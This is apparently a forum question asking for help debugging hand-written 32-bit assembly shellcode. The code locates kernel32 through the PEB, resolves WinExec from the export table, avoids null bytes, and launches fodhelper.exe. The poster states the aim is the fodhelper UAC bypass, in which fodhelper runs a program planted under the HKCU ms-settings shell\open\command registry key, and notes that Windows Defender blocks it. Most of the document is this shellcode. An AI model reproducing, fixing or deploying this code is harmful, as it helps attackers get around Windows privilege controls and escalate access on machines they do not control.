# Assembly code that executes fodhelper not working

Tags: assembly

I have written some assembly that obtains the address of WinExec from Kernel32 from the PEB, then calls WinExec after pushing the parameters onto the stack. The first parameter pushed is the string "C:\Windows\System32\fodhelper.exe", and the code is compiled as 32 bit with nasm

```
format PE console
use32
entry start

  start:
        push eax ; Save all registers
        push ebx
        push ecx
        push edx
        push esi
        push edi
        push ebp

    ; Establish a new stack frame
    push ebp
    mov ebp, esp

    sub esp, 18h            ; Allocate memory on stack for local variables

    ; push the function name on the stack
    xor esi, esi
    push esi            ; null termination
    push 63h
    pushw 6578h
    push 456e6957h
    mov [ebp-4], esp        ; var4 = "WinExec\x00"

    ; Find kernel32.dll base address
    xor esi, esi            ; esi = 0
        mov ebx, [fs:30h + esi]     ; written this way to avoid null bytes
    mov ebx, [ebx + 0x0C] 
    mov ebx, [ebx + 0x14] 
    mov ebx, [ebx]  
    mov ebx, [ebx]  
    mov ebx, [ebx + 0x10]       ; ebx holds kernel32.dll base address
    mov [ebp-8], ebx        ; var8 = kernel32.dll base address

    ; Find WinExec address
    mov eax, [ebx + 3Ch]        ; RVA of PE signature
    add eax, ebx            ; Address of PE signature = base address + RVA of PE signature
    mov eax, [eax + 78h]        ; RVA of Export Table
    add eax, ebx            ; Address of Export Table

    mov ecx, [eax + 24h]        ; RVA of Ordinal Table
    add ecx, ebx            ; Address of Ordinal Table
    mov [ebp-0Ch], ecx      ; var12 = Address of Ordinal Table

    mov edi, [eax + 20h]        ; RVA of Name Pointer Table
    add edi, ebx            ; Address of Name Pointer Table
    mov [ebp-10h], edi      ; var16 = Address of Name Pointer Table

    mov edx, [eax + 1Ch]        ; RVA of Address Table
    add edx, ebx            ; Address of Address Table
    mov [ebp-14h], edx      ; var20 = Address of Address Table

    mov edx, [eax + 14h]        ; Number of exported functions

    xor eax, eax            ; counter = 0

    .loop:
            mov edi, [ebp-10h]  ; edi = var16 = Address of Name Pointer Table
            mov esi, [ebp-4]    ; esi = var4 = "WinExec\x00"
            xor ecx, ecx

            cld             ; set DF=0 => process strings from left to right
            mov edi, [edi + eax*4]  ; Entries in Name Pointer Table are 4 bytes long
                        ; edi = RVA Nth entry = Address of Name Table * 4
            add edi, ebx        ; edi = address of string = base address + RVA Nth entry
            add cx, 8       ; Length of strings to compare (len('WinExec') = 8)
            repe cmpsb          ; Compare the first 8 bytes of strings in 
                        ; esi and edi registers. ZF=1 if equal, ZF=0 if not
            jz start.found

            inc eax         ; counter++
            cmp eax, edx        ; check if last function is reached
            jb start.loop       ; if not the last -> loop

            add esp, 26h            
            jmp start.end       ; if function is not found, jump to end

    .found:
        ; the counter (eax) now holds the position of WinExec

            mov ecx, [ebp-0Ch]  ; ecx = var12 = Address of Ordinal Table
            mov edx, [ebp-14h]      ; edx = var20 = Address of Address Table

            mov ax, [ecx + eax*2]   ; ax = ordinal number = var12 + (counter * 2)
            mov eax, [edx + eax*4]  ; eax = RVA of function = var20 + (ordinal * 4)
            add eax, ebx        ; eax = address of WinExec = 
                        ; = kernel32.dll base address + RVA of WinExec

            xor edx, edx
        push edx        ; null termination
        push 65h
        push 78652e72h
        push 65706c65h
        push 68646f66h
        push 5c32336dh
        push 65747379h
        push 535c7377h
        push 6f646e69h
        push 575c3a43h
        mov esi, esp        ; esi -> "C:\Windows\System32\fodhelper.exe"

        push 10         ; window state SW_SHOWDEFAULT
        push esi        ; "C:\Windows\System32\fodhelper.exe"
        call eax        ; WinExec

        add esp, 46h        ; clear the stack

    .end:
        
        pop ebp         ; restore all registers and exit
        pop edi
        pop esi
        pop edx
        pop ecx
        pop ebx
        pop eax
        ret
```

However, when executed the program does not run fodhelper and just crashes.

I am trying to get fodhelper to run a program from the registry key HKEY_CURRENT_USER\SOFTWARE\Classes\ms-settings\Shell\Open\command, and when i run fodhelper normally i get a windows defender error. But when i run with this code nothing happens. I have replaced fodhelper with other programs, such as calc.exe ("C:\Windows\System32\calc.exe") and it works.